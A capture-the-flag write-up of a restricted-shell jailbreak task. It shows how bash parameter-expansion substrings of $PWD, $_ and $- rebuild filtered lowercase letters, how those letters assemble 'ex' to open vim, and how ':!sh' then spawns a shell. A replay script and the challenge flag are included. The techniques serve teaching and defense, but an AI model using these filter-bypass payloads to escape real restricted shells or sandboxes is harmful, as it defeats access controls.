# Special (Pwn)

A classic restricted shell jailbreak task.
We can ssh to a server and get access via some kind of restricted shell.
It's all black box, so we need to poke around a bit to figure out what we can and can't do.

We only get back output from stderr, which makes things a bit harder.
Sending some random payloads tells us that our commands are executed via `bash -c "cmd"`.
Some input filtering is also applied.

We can send `$PWD` as the command, which produces the error `bash: /home/special: Is a directory`. This is very useful, because we can send for example `$PWDabcdefg...` and the error message echoes the string back with the filtered characters removed.
From this we learn that we can use `{}|;:<>$'#^_+-` and all uppercase letters. Next we test bash's special variables, and `$_` gives an interesting result:

```
declare -x A="T"
declare -x AB="HI"
declare -x ABC="ISN"
declare -x ABCD="OTTH"
declare -x ABCDE="EFLAG"
declare -x ABCDEF="BUTMAY"
declare -x ABCDEFG="BEITCAN"
declare -x ABCDEFGH="HELPGETT"
declare -x ABCDEFGHI="INGFLAG:D"
declare -x OLDPWD
declare -x PWD="/home/special"
declare -x SHELL=""
declare -x SHLVL="1"
declare -x _="export"
```

Now what we want to do is create some meaningful command.
Sadly we don't have `()`, so we can't do any arithmetic and therefore can't create numbers that way.
The intended solution was to use `${#variable_name}` to get the length of a variable, and thus get some numbers, but we didn't know that... What we can do is use `${variable:K:N}`, which is the substring of the variable starting at index K with length N.
The only numbers we have are `$SHLVL` with value 1 and `$#` with value 0, and with those we can get:

```
slash -> ${PWD::$SHLVL}
h     -> ${-::$SHLVL}
a     -> ${PWD:$SHLVL$SHLVL:$SHLVL}
i     -> ${PWD:$SHLVL$#:$SHLVL}
e     -> ${_:$#:$SHLVL}
x     -> ${_:$SHLVL:$SHLVL}
```
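The expansions above replayed offline, as an added example that is not part of the original writeup. It models the jail with an inner `bash -c` (PWD, SHLVL, `$#` and `$_` set to the values in the export dump, `$-` as any non-interactive `bash -c` reports it) and models the jail's filter from the allowed character set recovered above; the point for a defender is that every payload passes a character denylist unchanged and still expands to a filtered lowercase letter, so filtering characters does not constrain what the shell evaluates.

```bash
#!/bin/sh
# Replays the writeup's expansions offline. The inner `bash -c` models the
# jail: PWD=/home/special, SHLVL=1, $#=0 and $_=export mirror the export dump;
# $- is whatever a non-interactive `bash -c` reports (hBc).

# Expand one payload the way the jail's `bash -c "cmd"` would and print it.
jail_expand() {
    # PWD is assigned directly so the directory need not exist; a bare
    # `export` leaves $_ set to the word "export", as in the dump.
    bash -c "PWD=/home/special; SHLVL=1; export >/dev/null; printf '%s' \"$1\""
}

# Model of the jail's character filter (an assumption built from the writeup):
# only {}|;:<>$'#^_+- and uppercase letters survive. Returns 0 if the payload
# contains nothing else, 1 if the filter would alter it.
passes_filter() {
    allowed="A-Z{}|;:<>\$'#^_+-"
    case $1 in
        *[!$allowed]*) return 1 ;;
    esac
    return 0
}

# Assemble the writeup's `ex` from the two $_ substrings. Prints "ex" only if
# the payload survives the filter unchanged: the denylist never sees the
# lowercase letters, because the shell produces them after filtering.
demo_ex() {
    payload='${_:$#:$SHLVL}${_:$SHLVL:$SHLVL}'
    passes_filter "$payload" || return 1
    jail_expand "$payload"
}

# Each recovered character, with the payload that produces it.
for p in '${PWD::$SHLVL}' '${-::$SHLVL}' '${PWD:$SHLVL$SHLVL:$SHLVL}' \
         '${PWD:$SHLVL$#:$SHLVL}' '${_:$#:$SHLVL}' '${_:$SHLVL:$SHLVL}'; do
    if passes_filter "$p"; then status=passes; else status=filtered; fi
    printf '%-32s -> %s (%s)\n' "$p" "$(jail_expand "$p")" "$status"
done
```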


Again, the intended solution was to get `s` and `h` and spawn a shell, but we didn't have `s`.
Fortunately we figured out that we can run the `ex` command, which spawns vim!

From vim we can simply run `:!sh` to spawn a shell and read the flag: `Flag{B4sh_subst1tut1on_is_gud!}`

[Original writeup](https://github.com/p4-team/ctf/tree/master/2018-03-24-securinets/pwn_special).